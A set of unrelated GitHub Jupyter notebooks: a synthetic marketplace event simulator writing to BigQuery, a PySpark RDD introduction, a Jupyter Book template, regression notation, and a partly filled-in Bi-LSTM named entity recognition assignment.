transformed = model.fit_transform(z)
xs = transformed[:,0]
ys = transformed[:,1]
plt.scatter(xs,ys,c=train_labels)
plt.show()
```
|
github_jupyter
|
# Content with notebooks
You can also create content with Jupyter Notebooks. This means that you can include
code blocks and their outputs in your book.
## Markdown + notebooks
As it is markdown, you can embed images, HTML, etc into your posts!


You can also $add_{math}$ and
$$
math^{blocks}
$$
or
$$
\begin{aligned}
\mbox{mean} la_{tex} \\ \\
math blocks
\end{aligned}
$$
But make sure you \$Escape \$your \$dollar signs \$you want to keep!
## MyST markdown
MyST markdown works in Jupyter Notebooks as well. For more information about MyST markdown, check
out [the MyST guide in Jupyter Book](https://jupyterbook.org/content/myst.html),
or see [the MyST markdown documentation](https://myst-parser.readthedocs.io/en/latest/).
## Code blocks and outputs
Jupyter Book will also embed your code blocks and output in your book.
For example, here's some sample Matplotlib code:
```
from matplotlib import rcParams, cycler
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
# Fixing random state for reproducibility
np.random.seed(19680801)
N = 10
data = [np.logspace(0, 1, 100) + np.random.randn(100) + ii for ii in range(N)]
data = np.array(data).T
cmap = plt.cm.coolwarm
rcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N)))
from matplotlib.lines import Line2D
custom_lines = [Line2D([0], [0], color=cmap(0.), lw=4),
Line2D([0], [0], color=cmap(.5), lw=4),
Line2D([0], [0], color=cmap(1.), lw=4)]
fig, ax = plt.subplots(figsize=(10, 5))
lines = ax.plot(data)
ax.legend(custom_lines, ['Cold', 'Medium', 'Hot']);
```
There is a lot more that you can do with outputs (such as including interactive outputs)
with your book. For more information about this, see [the Jupyter Book documentation](https://jupyterbook.org)
Next, we can include the constant term $a$ into the vector $b$. This is done by adding an all-ones column to $\mathbf{X}$:
\begin{equation*}
\begin{bmatrix}
y_1\\
y_2\\
. \\
. \\
. \\
y_i
\end{bmatrix}
=
\begin{bmatrix}
1& x_{11} & x_{21} & x_{31} & \ldots & x_{p1}\\
1 & x_{12} & x_{22} & x_{32} & \ldots & x_{p2}\\
&\ldots&\ldots&\ldots&\ldots&\ldots\\
&\ldots&\ldots&\ldots&\ldots&\ldots\\
1& x_{1i} & x_{2i} & x_{3i} & \ldots & x_{pi}
\end{bmatrix}
\cdot
\begin{bmatrix}
a\\
b_1\\
b_2\\
.\\
.\\
b_p
\end{bmatrix}
\end{equation*}
\begin{align*}
y_1&=a+b_1\cdot x_{11}+b_2\cdot x_{21}+\cdots + b_p\cdot x_{p1}\\
y_2&=a+b_1\cdot x_{12}+b_2\cdot x_{22}+\cdots + b_p\cdot x_{p2}\\
\ldots& \ldots\\
y_i&=a+b_1\cdot x_{1i}+b_2\cdot x_{2i}+\cdots + b_p\cdot x_{pi}\\
\end{align*}
|
github_jupyter
|
```
import numpy as np
from datetime import datetime, timedelta
import time
# some probabilities should be dynamics, for example:
# buying probability depends on the number of available items
# listing probability increases if user has sold something in the past
# probability of churn increases if user hasn't listed + hasn't bought anything + doesn't have anything in the basket
# instead of using random choise for time, we should use distribution (exponential, binomial, normal etc)
events = {
'visit': {
'condition': True,
'inputs': 'timestamp',
'time': [0, 20],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.6, 0.05, 0.35]
},
'create_account': {
'time': [30, 150],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.8, 0.1, 0.1]
},
'list_item': {
'conditions': ['registered'],
'time': [90, 300],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.1, 0.3, 0.6]
},
'search': {
'time': [10, 120],
'next_events': ['search', 'view_item', 'list_item', 'do_nothing'],
'probabilities': [0.35, 0.5, 0.01, 0.14]
},
'view_item': {
'time': [10, 30],
'next_events': ['view_item', 'send_message', 'search', 'add_to_basket', 'list_item', 'do_nothing'],
'probabilities': [0.4, 0.1, 0.2, 0.1, 0.01, 0.19]
},
'send_message': {
'conditions': ['registered'],
'time': [10, 30],
'next_events': ['view_item', 'search', 'add_to_basket', 'do_nothing'],
'probabilities': [0.5, 0.25, 0.05, 0.2]
},
'read_message': {
'conditions': ['n_unread_messages > 0'],
'time': [1, 10],
'next_events': ['answer', 'search', 'list_item', 'do_nothing'],
'probabilities': [0.8, 0.1, 0.01, 0.09]
},
'answer': {
'conditions': ['n_read_messages > 0'],
'time': [5, 120],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.3, 0.01, 0.69]
},
'add_to_basket': {
'conditions': ['registered'],
'time': [5, 120],
'next_events': ['search', 'view_item', 'open_basket', 'do_nothing'],
'probabilities': [0.2, 0.2, 0.45, 0.15]
},
'open_basket': {
'conditions': ['n_items_in_basket > 0'],
'time': [5, 120],
'next_events': ['search', 'remove_from_basket', 'pay', 'list_item', 'do_nothing'],
'probabilities': [0.05, 0.35, 0.45, 0.01, 0.15]
},
'remove_from_basket': {
'conditions': ['n_items_in_basket > 0'],
'time': [1, 20],
'next_events': ['search', 'remove_from_basket', 'pay', 'do_nothing'],
'probabilities': [0.2, 0.2, 0.2, 0.4]
},
'pay': {
'conditions': ['registered', 'n_items_in_basket > 0'],
'time': [180, 1800],
'next_events': ['search', 'do_nothing'],
'probabilities': [0.1, 0.9]
},
'do_nothing': {}
}
def create_event_data(event_name, user_id, timestamp, properties=None):
d = {
'event_name': event_name,
'user_id': user_id,
'timestamp': timestamp
}
if properties is not None:
for p in properties.keys():
d[p] = properties
return d
users = dict()
items = dict()
messages = dict()
class Item:
def __init__(self, item_id, lister_id, listing_date):
self.item_id = item_id
self.lister_id = lister_id
self.listing_date = listing_date
self.status = 'active'
class Message:
def __init__(self, sender_id, recepient_id, message_id, timestamp):
self.sender_id = sender_id
self.recepient_id = recepient_id
self.message_id = message_id
self.timestamp = timestamp
current_date = datetime(2021,4,18,23,10,11)
class User:
def __init__(self, name, user_id):
self.name = name
self.user_id = user_id
self.registered = False
satisfaction_impact = {
'registration': 10,
'message_sent': 1,
'message_read': 1,
'list_item': 10,
'purchase': 20,
'sale': 20,
'delete_item': -20,
'days_listed': -1,
'search': -1,
'item_view': -1
}
@property
def visit_probability(self):
"""Calculate visit_probability as combination of initial probability and satisfaction level and other factor.
"""
probability_visit_from_satisfaction = 0.01 + self.satisfaction / 1000
if probability_visit_from_satisfaction < 0:
probability_visit_from_satisfaction = 0
elif probability_visit_from_satisfaction > 0.05:
probability_visit_from_satisfaction = 0.05
probability_visit_from_messages = self.n_unread_messages * 0.2
if probability_visit_from_messages > 0.6:
probability_visit_from_messages = 0.6
probability_visit_total = probability_visit_from_satisfaction + probability_visit_from_messages
return probability_visit_total
@property
def satisfaction(self):
"""Calculate user satisfaction level.
"""
satisfaction = 0
if self.registered:
satisfaction += self.satisfaction_impact['registration']
if hasattr(self, 'messages_sent'):
satisfaction += self.n_messages_sent * self.satisfaction_impact['message_sent']
if hasattr(self, 'messages_read'):
satisfaction += self.n_messages_read * self.satisfaction_impact['message_read']
if hasattr(self, 'n_listed_items'):
satisfaction += self.n_listed_items * self.satisfaction_impact['list_item']
if hasattr(self, 'n_purchases'):
satisfaction += self.n_purchases * self.satisfaction_impact['purchase']
if hasattr(self, 'n_sold_items'):
satisfaction += self.n_sold_items * self.satisfaction_impact['sale']
if hasattr(self, 'item_views'):
satisfaction += self.item_views * self.satisfaction_impact['item_view']
if hasattr(self, 'searches'):
satisfaction += self.searches * self.satisfaction_impact['search']
if hasattr(self, 'n_deleted_items'):
satisfaction += self.n_deleted_items * self.satisfaction_impact['delete_item']
if hasattr(self, 'active_items'):
for item_id in self.active_items:
satisfaction += (current_date - items[item_id].listing_date).days * self.satisfaction_impact['days_listed']
return satisfaction
@property
def listing_index(self):
if self.n_sold_items > 0:
index = self.n_sold_items / self.n_listed_items / 0.5
elif self.n_listed_items:
index = 1 - self.n_listed_items * 0.1 if self.n_listed_items <= 10 else 0
else:
index = 1
return index
@property
def items_in_basket(self):
"""Calculate items in basket
"""
return len(self.basket) if hasattr(self, 'basket') else 0
@property
def unread_messages(self):
"""Get list of unread messages
"""
received_messages = self.messages_received if hasattr(self, 'messages_received') else []
read_messages = self.read_messages if hasattr(self, 'read_messages') else []
unread_messages = list(set(received_messages) - set(read_messages))
return unread_messages
@property
def n_listed_items(self):
"""Calculate number of listed items
"""
return len(self.listed_items) if hasattr(self, 'listed_items') else 0
@property
def n_active_items(self):
"""Calculate number of active items
"""
return len(self.active_items) if hasattr(self, 'active_items') else 0
@property
def n_deleted_items(self):
"""Calculate number of deleted items
"""
return len(self.deleted_items) if hasattr(self, 'deleted_items') else 0
@property
def n_items_in_basket(self):
"""Calculate number of deleted items
"""
return len(self.basket) if hasattr(self, 'basket') else 0
@property
def n_sold_items(self):
"""Calculate number of sold items
"""
return len(self.sold_items) if hasattr(self, 'sold_items') else 0
@property
def n_purchases(self):
"""Calculate number of purchased items
"""
return len(self.purchased_items) if hasattr(self, 'purchased_items') else 0
@property
def n_messages_sent(self):
"""Calculate number of sent messages
"""
return len(self.messages_sent) if hasattr(self, 'messages_sent') else 0
@property
def n_messages_received(self):
"""Calculate number of received messages
"""
return len(self.messages_received) if hasattr(self, 'messages_received') else 0
@property
def n_unread_messages(self):
"""Calculate number of received messages
"""
return len(self.unread_messages) if hasattr(self, 'unread_messages') else 0
@property
def n_read_messages(self):
"""Calculate number of read messages
"""
return len(self.messages_read) if hasattr(self, 'messages_read') else 0
def visit(self, platform, country, timestamp):
"""User visit event.
It's the first touch with the app within a session.
Event creates / updates user attributes:
visits: number of visits.
last_visit: time of the last visit.
last_activity: time of the last activity.
last_properties: properties like platform and country.
Parameters:
timestamp: time of the event.
platform: platform of the visit: 'ios', 'android', 'web'.
country: country code of the visit: 'US', 'DE', 'GB' etc.
"""
self.active_session = True
self.last_event = 'visit'
self.last_activity = timestamp
self.visits = self.visits + 1 if hasattr(self, 'visits') else 1
self.last_visit = timestamp
self.last_properties = {
'platform': platform,
'country': country
}
print(self.last_event, timestamp)
def create_account(self, timestamp):
"""User creates an account.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'create_account'
self.last_activity = timestamp
self.registered = True
self.registration_date = timestamp
print(self.last_event, timestamp)
def send_message(self, timestamp):
"""User sends message to another user.
Parameters:
recepient_id: id of the user who receives the message.
timestamp: time of the event.
"""
self.last_event = 'send_message'
self.last_activity = timestamp
# create message id
recepient_id = items[self.open_item].lister_id
message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))
# add messages to user attributes
if hasattr(self, 'messages_sent'):
self.messages_sent.append(message_id)
else:
self.messages_sent = [message_id]
# store data to messages dict
messages[message_id] = Message(sender_id=self.user_id,
recepient_id=recepient_id,
message_id=message_id,
timestamp=timestamp)
# update recepient attributes
if hasattr(users[recepient_id], 'messages_received'):
users[recepient_id].messages_received.append(message_id)
else:
users[recepient_id].messages_received = [message_id]
print(self.last_event, timestamp)
def read_message(self, timestamp):
"""User reads message from another user.
Parameters:
message_id: id of the message.
timestamp: time of the event.
"""
self.last_event = 'read_message'
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
message_id = rand.choice(a=self.unread_messages)
self.unread_messages.remove(message_id)
# store message to user's read messages
if hasattr(self, 'read_messages'):
self.read_messages.append(message_id)
else:
self.read_messages = [message_id]
print(self.last_event, timestamp)
def answer(self, timestamp):
"""User reads message from another user.
Parameters:
message_id: id of the message.
timestamp: time of the event.
"""
self.last_event = 'answer'
self.last_activity = timestamp
# get sender_id who will be recepient of the next message
message_id = self.read_messages[-1]
recepient_id = messages[message_id].sender_id
# create new message_id
new_message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))
# add messages to user attributes
if hasattr(self, 'messages_sent'):
self.messages_sent.append(new_message_id)
else:
self.messages_sent = [new_message_id]
# store data to messages dict
messages[message_id] = Message(sender_id=self.user_id,
recepient_id=recepient_id,
message_id=new_message_id,
timestamp=timestamp)
# update recepient attributes
if hasattr(users[recepient_id], 'messages_received'):
users[recepient_id].messages_received.append(message_id)
else:
users[recepient_id].messages_received = [message_id]
print(self.last_event, timestamp)
def list_item(self, timestamp):
"""User lists an item.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'list_item'
self.last_activity = timestamp
item_id = hash(str(self.user_id) + str(timestamp))
if hasattr(self, 'listed_items'):
self.listed_items.append(item_id)
else:
self.listed_items = [item_id]
if hasattr(self, 'active_items'):
self.active_items.append(item_id)
else:
self.active_items = [item_id]
items[item_id] = Item(item_id=item_id,
lister_id=self.user_id,
listing_date=timestamp)
print(self.last_event, timestamp)
def search(self, timestamp):
"""User performs a search.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'search'
self.searches = self.searches + 1 if hasattr(self, 'searches') else 1
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
self.available_items = rand.choice(a=list(items.keys()), size=20 if len(items.keys())>=20 else len(items.keys()), replace=False)
print(self.last_event, timestamp)
def view_item(self, timestamp):
"""User views an item.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'view_item'
self.last_activity = timestamp
self.item_views = self.item_views + 1 if hasattr(self, 'item_views') else 1
rand = np.random.default_rng(seed=abs(hash(timestamp)))
item_id = rand.choice(a=self.available_items)
self.open_item = item_id
items[item_id].views = items[item_id].views + 1 if hasattr(items[item_id], 'views') else 1
print(self.last_event, timestamp)
def add_to_basket(self, timestamp):
"""User adds an item to the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'add_to_basket'
self.last_activity = timestamp
if hasattr(self, 'basket'):
self.basket.append(self.open_item)
else:
self.basket = [self.open_item]
print(self.last_event, timestamp)
def open_basket(self, timestamp):
"""User adds an item to the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'open_basket'
self.last_activity = timestamp
print(self.last_event, timestamp)
def remove_from_basket(self, timestamp):
"""User removes an item to the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'remove_from_basket'
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
item_id = rand.choice(a=self.basket)
self.basket.remove(item_id)
print(self.last_event, timestamp)
def pay(self, timestamp):
"""User pays for item / set of items.
Parameters:
item_id: id of the item user views.
timestamp: time of the event.
"""
self.last_event = 'pay'
self.last_activity = timestamp
for item_id in self.basket:
# updateitems attributes
items[item_id].status = 'sold'
items[item_id].buyer = self.user_id
items[item_id].date_sold = timestamp
# update lister's attributes
lister_id = items[item_id].lister_id
users[lister_id].active_items.remove(item_id)
if hasattr(users[lister_id], 'sold_items'):
users[lister_id].sold_items.append(item_id)
else:
users[lister_id].sold_items = [item_id]
# update buyer's attributes
if hasattr(self, 'purchased_items'):
self.purchased_items.extend(self.basket)
else:
self.purchased_items = self.basket
# empy basket
self.basket = []
print(self.last_event, timestamp)
def delete_items(self, item_id, timestamp):
"""User removes an item.
Parameters:
item_id: id of the item user views.
timestamp: time of the event.
"""
self.last_event = 'delete_items'
self.last_activity = timestamp
self.active_items.remove(item_id)
items[item_id].status = 'deleted'
items[item_id].date_deleted = timestamp
if hasattr(self, 'deleted_items'):
self.deleted_items.append(item_id)
else:
self.deleted_items = [item_id]
def do_nothing(self, timestamp):
self.active_session = False
def session(user_id, timestamp):
if user_id not in users.keys():
users[user_id] = User(name=str(user_id), user_id='user_id')
users[user_id].visit(timestamp=timestamp, platform='ios', country='DE')
# number of the event
n = 0
while users[user_id].active_session:
last_event = users[user_id].last_event
next_events = events[last_event]['next_events'].copy()
probabilities = events[last_event]['probabilities'].copy()
# adjust registration probability
if users[user_id].registered == False and 'create_account' not in next_events:
# add registration as potential event
next_events.append('create_account')
probabilities = [prob * 0.8 for prob in probabilities]
probabilities.append(0.2)
# adjust open basket probability
if users[user_id].n_items_in_basket > 0 and users[user_id].last_event != 'open_basket' and 'open_basket' not in next_events:
next_events.append('open_basket')
probabilities = [prob * 0.8 for prob in probabilities]
probabilities.append(0.2)
# adjust read_message probability
if users[user_id].n_unread_messages > 0:
# add read_message as potential event
next_events.append('read_message')
probabilities = [prob * 0.2 for prob in probabilities]
probabilities.append(0.8)
# adjust listing probability
if 'list_item' in next_events:
index = next_events.index('list_item')
probabilities[index] = probabilities[index] * users[user_id].listing_index
# with every event probability of do nothing grows
if 'do_nothing' in next_events:
index = next_events.index('do_nothing')
probabilities[index] = probabilities[index] * (1 + n/100)
# check condition for every event
for event in next_events:
if 'conditions' in events[event]:
for condition in events[event]['conditions']:
if eval(f'users[user_id].{condition}') == False:
index = next_events.index(event)
next_events.remove(event)
probabilities.pop(index)
break
# normalize probabilities
total_p = sum(probabilities)
probabilities = [p/total_p for p in probabilities]
probabilities[0] = probabilities[0] + 1-sum(probabilities)
rand = np.random.default_rng(seed=timestamp.minute*60+timestamp.second+user_id)
next_event = rand.choice(a=next_events, p=probabilities)
time_delta = int(rand.integers(low=events[last_event]['time'][0], high=events[last_event]['time'][1]))
timestamp = timestamp + timedelta(seconds=time_delta)
eval(f'users[user_id].{next_event}(timestamp=timestamp)')
n += 1
# create initial set of items
users[1] = User(name='first user', user_id=1)
start_date = datetime.now() - timedelta(days=10)
users[1].create_account(timestamp=start_date)
for i in range(100):
users[1].list_item(timestamp=start_date + timedelta(seconds=i+1) + timedelta(minutes=i+1))
# create events for the first users
for i in range(2,101):
print('\nUSER: {}'.format(i))
users[i] = User(name='{} user'.format(i), user_id=i)
session(user_id=i, timestamp=start_date + timedelta(minutes=300+i) + timedelta(seconds=i))
for user_id in users.keys():
if user_id != 1:
print(f'user_id: {user_id}, satisfaction: {users[user_id].satisfaction}, visit probability: {users[user_id].visit_probability}')
users[31].registered
```
## Writing data to bigquery
```
from google.cloud import storage
from google.cloud import bigquery
import sys
import os
bigquery_client = bigquery.Client.from_service_account_json('../../credentials/data-analysis-sql-309220-6ce084250abd.json')
countries = ['UK', 'DE', 'AT']
countries_probs = [0.5, 0.4, 0.1]
agents = ['android', 'ios', 'web']
agents_probs = [0.4, 0.3, 0.3]
rand = np.random.default_rng(seed=1)
objects = []
for i in range(1000):
timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
object = {
'timestamp': timestamp,
'id': str(hash(timestamp)),
'nested': {
'os': rand.choice(a=agents, p=agents_probs),
'country': rand.choice(a=countries, p=countries_probs)
}
}
objects.append(object)
time.sleep(0.01)
bq_error = bigquery_client.insert_rows_json('data-analysis-sql-309220.synthetic.nested_test', objects)
if bq_error != []:
print(bq_error)
```
|
github_jupyter
|
# Introduction to Spark and Python
Let's learn how to use Spark with Python by using the pyspark library! Make sure to view the video lecture explaining Spark and RDDs before continuing on with this code.
This notebook will serve as reference code for the Big Data section of the course involving Amazon Web Services. The video will provide fuller explanations for what the code is doing.
## Creating a SparkContext
First we need to create a SparkContext. We will import this from pyspark:
```
from pyspark import SparkContext
```
Now create the SparkContext,A SparkContext represents the connection to a Spark cluster, and can be used to create an RDD and broadcast variables on that cluster.
*Note! You can only have one SparkContext at a time the way we are running things here.*
```
sc = SparkContext()
```
## Basic Operations
We're going to start with a 'hello world' example, which is just reading a text file. First let's create a text file.
___
Let's write an example text file to read, we'll use some special jupyter notebook commands for this, but feel free to use any .txt file:
```
%%writefile example.txt
first line
second line
third line
fourth line
```
### Creating the RDD
Now we can take in the textfile using the **textFile** method off of the SparkContext we created. This method will read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an RDD of Strings.
```
textFile = sc.textFile('example.txt')
```
Spark’s primary abstraction is a distributed collection of items called a Resilient Distributed Dataset (RDD). RDDs can be created from Hadoop InputFormats (such as HDFS files) or by transforming other RDDs.
### Actions
We have just created an RDD using the textFile method and can perform operations on this object, such as counting the rows.
RDDs have actions, which return values, and transformations, which return pointers to new RDDs. Let’s start with a few actions:
```
textFile.count()
textFile.first()
```
### Transformations
Now we can use transformations, for example the filter transformation will return a new RDD with a subset of items in the file. Let's create a sample transformation using the filter() method. This method (just like Python's own filter function) will only return elements that satisfy the condition. Let's try looking for lines that contain the word 'second'. In which case, there should only be one line that has that.
```
secfind = textFile.filter(lambda line: 'second' in line)
# RDD
secfind
# Perform action on transformation
secfind.collect()
# Perform action on transformation
secfind.count()
```
Notice how the transformations won't display an output and won't be run until an action is called. In the next lecture: Advanced Spark and Python we will begin to see many more examples of this transformation and action relationship!
# Great Job!
|
github_jupyter
|
# Recognize named entities on Twitter with LSTMs
In this assignment, you will use a recurrent neural network to solve Named Entity Recognition (NER) problem. NER is a common task in natural language processing systems. It serves for extraction such entities from the text as persons, organizations, locations, etc. In this task you will experiment to recognize named entities from Twitter.
For example, we want to extract persons' and organizations' names from the text. Than for the input text:
Ian Goodfellow works for Google Brain
a NER model needs to provide the following sequence of tags:
B-PER I-PER O O B-ORG I-ORG
Where *B-* and *I-* prefixes stand for the beginning and inside of the entity, while *O* stands for out of tag or no tag. Markup with the prefix scheme is called *BIO markup*. This markup is introduced for distinguishing of consequent entities with similar types.
A solution of the task will be based on neural networks, particularly, on Bi-Directional Long Short-Term Memory Networks (Bi-LSTMs).
### Libraries
For this task you will need the following libraries:
- [Tensorflow](https://www.tensorflow.org) — an open-source software library for Machine Intelligence.
In this assignment, we use Tensorflow 1.15.0. You can install it with pip:
!pip install tensorflow==1.15.0
- [Numpy](http://www.numpy.org) — a package for scientific computing.
If you have never worked with Tensorflow, you would probably need to read some tutorials during your work on this assignment, e.g. [this one](https://www.tensorflow.org/tutorials/recurrent) could be a good starting point.
### Data
The following cell will download all data required for this assignment into the folder `week2/data`.
```
try:
import google.colab
IN_COLAB = True
except:
IN_COLAB = False
if IN_COLAB:
! wget https://raw.githubusercontent.com/hse-aml/natural-language-processing/master/setup_google_colab.py -O setup_google_colab.py
import setup_google_colab
setup_google_colab.setup_week2()
import sys
sys.path.append("..")
from common.download_utils import download_week2_resources
download_week2_resources()
```
### Load the Twitter Named Entity Recognition corpus
We will work with a corpus, which contains tweets with NE tags. Every line of a file contains a pair of a token (word/punctuation symbol) and a tag, separated by a whitespace. Different tweets are separated by an empty line.
The function *read_data* reads a corpus from the *file_path* and returns two lists: one with tokens and one with the corresponding tags. You need to complete this function by adding a code, which will replace a user's nickname to `<USR>` token and any URL to `<URL>` token. You could think that a URL and a nickname are just strings which start with *http://* or *https://* in case of URLs and a *@* symbol for nicknames.
```
def read_data(file_path):
tokens = []
tags = []
tweet_tokens = []
tweet_tags = []
for line in open(file_path, encoding='utf-8'):
line = line.strip()
if not line:
if tweet_tokens:
tokens.append(tweet_tokens)
tags.append(tweet_tags)
tweet_tokens = []
tweet_tags = []
else:
token, tag = line.split()
# Replace all urls with <URL> token
# Replace all users with <USR> token
######################################
######### YOUR CODE HERE #############
######################################
tweet_tokens.append(token)
tweet_tags.append(tag)
return tokens, tags
```
And now we can load three separate parts of the dataset:
- *train* data for training the model;
- *validation* data for evaluation and hyperparameters tuning;
- *test* data for final evaluation of the model.
```
train_tokens, train_tags = read_data('data/train.txt')
validation_tokens, validation_tags = read_data('data/validation.txt')
test_tokens, test_tags = read_data('data/test.txt')
```
You should always understand what kind of data you deal with. For this purpose, you can print the data running the following cell:
```
for i in range(3):
for token, tag in zip(train_tokens[i], train_tags[i]):
print('%s\t%s' % (token, tag))
print()
```
### Prepare dictionaries
To train a neural network, we will use two mappings:
- {token}$\to${token id}: address the row in embeddings matrix for the current token;
- {tag}$\to${tag id}: one-hot ground truth probability distribution vectors for computing the loss at the output of the network.
Now you need to implement the function *build_dict* which will return {token or tag}$\to${index} and vice versa.
```
from collections import defaultdict
def build_dict(tokens_or_tags, special_tokens):
"""
tokens_or_tags: a list of lists of tokens or tags
special_tokens: some special tokens
"""
# Create a dictionary with default value 0
tok2idx = defaultdict(lambda: 0)
idx2tok = []
# Create mappings from tokens (or tags) to indices and vice versa.
# At first, add special tokens (or tags) to the dictionaries.
# The first special token must have index 0.
# Mapping tok2idx should contain each token or tag only once.
# To do so, you should:
# 1. extract unique tokens/tags from the tokens_or_tags variable, which is not
# occur in special_tokens (because they could have non-empty intersection)
# 2. index them (for example, you can add them into the list idx2tok
# 3. for each token/tag save the index into tok2idx).
######################################
######### YOUR CODE HERE #############
######################################
return tok2idx, idx2tok
```
After implementing the function *build_dict* you can make dictionaries for tokens and tags. Special tokens in our case will be:
- `<UNK>` token for out of vocabulary tokens;
- `<PAD>` token for padding sentence to the same length when we create batches of sentences.
```
special_tokens = ['<UNK>', '<PAD>']
special_tags = ['O']
# Create dictionaries
token2idx, idx2token = build_dict(train_tokens + validation_tokens, special_tokens)
tag2idx, idx2tag = build_dict(train_tags, special_tags)
```
The next additional functions will help you to create the mapping between tokens and ids for a sentence.
```
def words2idxs(tokens_list):
return [token2idx[word] for word in tokens_list]
def tags2idxs(tags_list):
return [tag2idx[tag] for tag in tags_list]
def idxs2words(idxs):
return [idx2token[idx] for idx in idxs]
def idxs2tags(idxs):
return [idx2tag[idx] for idx in idxs]
```
### Generate batches
Neural Networks are usually trained with batches. It means that weight updates of the network are based on several sequences at every single time. The tricky part is that all sequences within a batch need to have the same length. So we will pad them with a special `<PAD>` token. It is also a good practice to provide RNN with sequence lengths, so it can skip computations for padding parts. We provide the batching function *batches_generator* readily available for you to save time.
```
def batches_generator(batch_size, tokens, tags,
shuffle=True, allow_smaller_last_batch=True):
"""Generates padded batches of tokens and tags."""
n_samples = len(tokens)
if shuffle:
order = np.random.permutation(n_samples)
else:
order = np.arange(n_samples)
n_batches = n_samples // batch_size
if allow_smaller_last_batch and n_samples % batch_size:
n_batches += 1
for k in range(n_batches):
batch_start = k * batch_size
batch_end = min((k + 1) * batch_size, n_samples)
current_batch_size = batch_end - batch_start
x_list = []
y_list = []
max_len_token = 0
for idx in order[batch_start: batch_end]:
x_list.append(words2idxs(tokens[idx]))
y_list.append(tags2idxs(tags[idx]))
max_len_token = max(max_len_token, len(tags[idx]))
# Fill in the data into numpy nd-arrays filled with padding indices.
x = np.ones([current_batch_size, max_len_token], dtype=np.int32) * token2idx['<PAD>']
y = np.ones([current_batch_size, max_len_token], dtype=np.int32) * tag2idx['O']
lengths = np.zeros(current_batch_size, dtype=np.int32)
for n in range(current_batch_size):
utt_len = len(x_list[n])
x[n, :utt_len] = x_list[n]
lengths[n] = utt_len
y[n, :utt_len] = y_list[n]
yield x, y, lengths
```
## Build a recurrent neural network
This is the most important part of the assignment. Here we will specify the network architecture based on TensorFlow building blocks. It's fun and easy as a lego constructor! We will create an LSTM network which will produce probability distribution over tags for each token in a sentence. To take into account both right and left contexts of the token, we will use Bi-Directional LSTM (Bi-LSTM). Dense layer will be used on top to perform tag classification.
```
import tensorflow as tf
import numpy as np
class BiLSTMModel():
pass
```
First, we need to create [placeholders](https://www.tensorflow.org/api_docs/python/tf/compat/v1/placeholder) to specify what data we are going to feed into the network during the execution time. For this task we will need the following placeholders:
- *input_batch* — sequences of words (the shape equals to [batch_size, sequence_len]);
- *ground_truth_tags* — sequences of tags (the shape equals to [batch_size, sequence_len]);
- *lengths* — lengths of not padded sequences (the shape equals to [batch_size]);
- *dropout_ph* — dropout keep probability; this placeholder has a predefined value 1;
- *learning_rate_ph* — learning rate; we need this placeholder because we want to change the value during training.
It could be noticed that we use *None* in the shapes in the declaration, which means that data of any size can be feeded.
You need to complete the function *declare_placeholders*.
```
def declare_placeholders(self):
"""Specifies placeholders for the model."""
# Placeholders for input and ground truth output.
self.input_batch = tf.placeholder(dtype=tf.int32, shape=[None, None], name='input_batch')
self.ground_truth_tags = ######### YOUR CODE HERE #############
# Placeholder for lengths of the sequences.
self.lengths = tf.placeholder(dtype=tf.int32, shape=[None], name='lengths')
# Placeholder for a dropout keep probability. If we don't feed
# a value for this placeholder, it will be equal to 1.0.
self.dropout_ph = tf.placeholder_with_default(tf.cast(1.0, tf.float32), shape=[])
# Placeholder for a learning rate (tf.float32).
self.learning_rate_ph = ######### YOUR CODE HERE #############
BiLSTMModel.__declare_placeholders = classmethod(declare_placeholders)
```
Now, let us specify the layers of the neural network. First, we need to perform some preparatory steps:
- Create embeddings matrix with [tf.Variable](https://www.tensorflow.org/api_docs/python/tf/Variable). Specify its name (*embeddings_matrix*), type (*tf.float32*), and initialize with random values.
- Create forward and backward LSTM cells. TensorFlow provides a number of RNN cells ready for you. We suggest that you use *LSTMCell*, but you can also experiment with other types, e.g. GRU cells. [This](http://colah.github.io/posts/2015-08-Understanding-LSTMs/) blogpost could be interesting if you want to learn more about the differences.
- Wrap your cells with [DropoutWrapper](https://www.tensorflow.org/api_docs/python/tf/contrib/rnn/DropoutWrapper). Dropout is an important regularization technique for neural networks. Specify all keep probabilities using the dropout placeholder that we created before.
After that, you can build the computation graph that transforms an input_batch:
- [Look up](https://www.tensorflow.org/api_docs/python/tf/nn/embedding_lookup) embeddings for an *input_batch* in the prepared *embedding_matrix*.
- Pass the embeddings through [Bidirectional Dynamic RNN](https://www.tensorflow.org/api_docs/python/tf/nn/bidirectional_dynamic_rnn) with the specified forward and backward cells. Use the lengths placeholder here to avoid computations for padding tokens inside the RNN.
- Create a dense layer on top. Its output will be used directly in loss function.
Fill in the code below. In case you need to debug something, the easiest way is to check that tensor shapes of each step match the expected ones.
```
def build_layers(self, vocabulary_size, embedding_dim, n_hidden_rnn, n_tags):
"""Specifies bi-LSTM architecture and computes logits for inputs."""
# Create embedding variable (tf.Variable) with dtype tf.float32
initial_embedding_matrix = np.random.randn(vocabulary_size, embedding_dim) / np.sqrt(embedding_dim)
embedding_matrix_variable = ######### YOUR CODE HERE #############
# Create RNN cells (for example, tf.nn.rnn_cell.BasicLSTMCell) with n_hidden_rnn number of units
# and dropout (tf.nn.rnn_cell.DropoutWrapper), initializing all *_keep_prob with dropout placeholder.
forward_cell = ######### YOUR CODE HERE #############
backward_cell = ######### YOUR CODE HERE #############
# Look up embeddings for self.input_batch (tf.nn.embedding_lookup).
# Shape: [batch_size, sequence_len, embedding_dim].
embeddings = ######### YOUR CODE HERE #############
